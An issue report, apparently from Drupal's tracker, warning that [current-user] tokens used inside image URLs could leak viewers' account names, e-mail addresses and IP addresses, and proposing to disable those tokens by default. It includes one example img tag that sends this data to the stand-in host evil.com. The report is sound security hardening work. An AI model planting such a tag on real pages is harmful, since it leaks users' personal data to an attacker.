Problem/Motivation

[current-user] tokens provide confidential information about the current user (e-mail, etc.).
Each user only sees their own information when using the token but if an attacker can write tokens in a place that triggers a HTTP request (an image URL for example), it could be used to exfiltrate this information.

For example if a module allows using tokens in image URLs, an attacker with the appropriate permission could generate this img tag:

<img src="http://evil.com/?user=[current-user:account-name]&amp;email=[current-user:mail]&amp;ip=[current-user:ip-address]">

And every time a user displays the page, their e-mail address is sent to the attacker.

Tokens currently don't have access checks (#3489852: Token replace system has no access checking) so they can be abused in various ways.
But even if this was fixed, each user would still have access to the [current-user] tokens and risk exfiltrating data when browsing a page. That's why I'm opening a separate issue.

Steps to reproduce

I don't think this can be exploited with core only.
See related issues for examples in contrib.

Proposed resolution

Maybe as a hardening we could disable these tokens by default so at least they can't be used on websites that don't need them.

Remaining tasks

User interface changes

Introduced terminology

API changes

Data model changes

Release notes snippet

Comments

prudloff created an issue.